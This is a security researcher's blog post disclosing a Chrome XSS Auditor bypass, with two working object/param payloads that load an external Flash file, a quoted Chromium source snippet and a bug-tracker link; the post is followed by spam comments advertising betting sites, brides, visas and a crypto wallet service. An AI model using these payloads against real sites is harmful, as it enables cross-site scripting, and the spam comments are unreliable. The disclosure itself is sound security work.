Tuesday, December 27, 2016

XSS Auditor bypass using obscure <param> tag

Hi there!
I just found an XSS Auditor bypass by accident when I read Chromium's code for the another reason.
In this short post, I'd like to share this bypass. I confirmed that it works on Chrome Canary 57.
I have already reported here: https://bugs.chromium.org/p/chromium/issues/detail?id=676992

The bypass is:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
<object allowscriptaccess=always>
<param name=url value=https://l0.cm/xss.swf>
Also it works:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=code%20value=https://l0.cm/xss.swf%3E
<object allowscriptaccess=always>
<param name=code value=https://l0.cm/xss.swf>
I didn't know that Chrome supports such params until I found it in the HTMLObjectElement.cpp:
if (url.isEmpty() && urlParameter.isEmpty() &&
    (equalIgnoringCase(name, "src") || equalIgnoringCase(name, "movie") ||
     equalIgnoringCase(name, "code") || equalIgnoringCase(name, "url")))
  urlParameter = stripLeadingAndTrailingHTMLSpaces(p->value());
The <param name="src" value="//attacker/xss.swf"> and <param name="movie" value="//attacker/xss.swf"> are blocked by XSS Auditor. But I noticed that code and url are not blocked. Using this, we can load Flash and execute the JavaScript. According to the source code's comment, it seems Chrome supports this for compatibility. But at least I confirmed it does not work on IE/Edge and Firefox. I think Chrome can remove this support :)

That's it. I wrote about XSS Auditor bypass using <param>. Thanks for reading!

21 comments:

  1. To do Not Pressure OR Anything, But Have Ever This considered post there is statement PT Lampung Service this is a
    Service HP Bandar Lampung whose looking to do day
    Service iPhone Lampung to this looking then to that is
    Jasa Kursus Service HP I will try it.
    Jasa Kursus Service HP They have jumping places and so that the device other kid's activity.Youtuber Lampung , Thanks ! Visit Back.

    ReplyDelete
  2. However I wish to say that this write-up very compelled me to take a look at and do it! Your writing taste has been surprised me. Thank you
    경마
    온라인경마

    ReplyDelete
  3. Most individuals all over the globe desire to start a warm and loving family, and ukrainian brides are those ladies who are willing to marry a foreigner. To start a discussion with these females, you must first tell them everything about yourself. After you've completed all of this, you may begin hunting for the same woman. In my experience, you can totally trust these people because I've been in contact with a female I'm interested in for over a year owing to them.

    ReplyDelete
  4. These are in fact wonderful ideas in concerning blogging. You have touched some good factors here. Any way keep up wrinting. วิธีสมัคร ufabet

    ReplyDelete
  5. I think your website has a lot of useful knowledge. I'm so thankful for this website.
    I hope that you continue to share a lot of knowledge.
    This is my website.
    넷파블머니상

    ReplyDelete
  6. This is new knowledge for me, I am excited about it. thanks....tourist visa India, You can get an online tourist visa for India and visit the beautiful religious places of India etc.

    ReplyDelete
  7. Good afternoon sir and your blog is great. Many people ask, India business visa requirements, you can see on my blog that all requirements related to business visa are available here.

    ReplyDelete
  8. There are a lot of commercial security alarm companies out there, and it can be tough to know which one to choose. commercial security alarm companies

    ReplyDelete
  9. Meeting rooms are situated away from the public areas, available day and evening, with or without private dining. If your itinerary allows it, slope based activities can be arranged which include effective teambuilding exercises created and led by our snow sports team. Your package can even include teaching your group a brand new sport! Meeting Rooms Yorkshire

    ReplyDelete
  10. Which is some inspirational stuff. Never knew that opinions might be this varied. Thank you for all the enthusiasm to provide such helpful information here.바카라사이트 It helped me a lot. If you have time, I hope you come to my site and share your opinions. Have a nice day.
    dsyyyt

    ReplyDelete
  11. Je n'ai aucun mot pour apprécier ce post…..Je suis vraiment impressionné par ce post.La personne qui a créé ce poste était un grand humain.Merci de nous l'avoir fait savoir. 먹튀검증

    ReplyDelete
  12. I love reading your blog because, you provide very informative blog post.
    www.google.com/maps?cid=4488280802242044319

    ReplyDelete
  13. Coinbase wallet can be used to store the crypto tokens that you buy from the Coinbase exchange. But do so, you are asked to link your wallet with the Coinbase exchange account. The process to add a Coinbase Wallet Login is quite clear. All you need to do is, access your wallet and visit the settings of your account. For more information visit :

    Coinbase Wallet $ Coinbase Wallet Extension $ Qantas Airlines $ Qantas flights

    ReplyDelete
  14. thank you for sharing this post! you done great effort
    truck driver accidents

    ReplyDelete
  15. It may be tempting to save money by repairing the door yourself, but in the long run, hiring a professional is the better choice. I tried to fix it myself and now I need to fix it more than before! Atlas Door Repair

    ReplyDelete